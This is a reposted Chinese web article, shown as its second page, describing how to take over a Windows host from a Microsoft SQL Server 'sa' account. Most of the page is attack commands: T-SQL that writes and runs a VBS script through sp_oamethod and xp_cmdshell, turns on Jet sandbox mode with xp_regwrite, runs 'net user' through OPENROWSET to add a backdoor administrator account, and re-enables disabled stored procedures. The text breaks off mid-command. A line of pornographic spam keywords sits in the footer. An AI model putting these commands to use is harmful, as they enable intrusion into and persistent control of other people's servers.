• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    Microsoft SQL Server SA權限最新入侵方法

    發布: 2009-10-21 09:59 | 作者: 不詳 | 來源: 領測軟件測試網采編 | 查看: 99次 | 進入軟件測試論壇討論

    領測軟件測試網

    exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

    exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

    exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject

    (os&"/test",user) '

    exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

    執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示“c:\1.vbs正被另一個程序運行”而無法成功添加用戶:

    exec master..xp_cmdshell 'cscript c:\1.vbs'

    如果系統用戶沒有添加成功,有可能是因為系統用戶的密碼1234的太簡單,不符合服務器的復雜密碼策略,可以考慮設置的復雜些,然后再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式為:

    exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")

    >>1.vbs'

    不過,不知道為什么所有帶“&”字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。

    使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:

    Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0

    \Engines','SandBoxMode','REG_DWORD',1

    然后執行沙盤命令,在系統添加一個用戶名為test,密碼為1234的用戶:

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

    \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

    \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup

    administrators test /add")')

    不同的操作系統,路徑也不一樣,需要根據情況做修改:

    NT/2K: c:\winnt\system32\

    XP/2003: c:\windows\system32\

    另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開:

    開啟XP_cmdshell:

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure

    'xp_cmdshell', 1;RECONFIGURE;

    開啟'OPENROWSET':

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure

    'Ad Hoc Distributed Queries',1;RECONFIGURE;

    開啟'sp_oacreate':

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp

     

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/

    22/2<12

    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備2023014753號-2
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>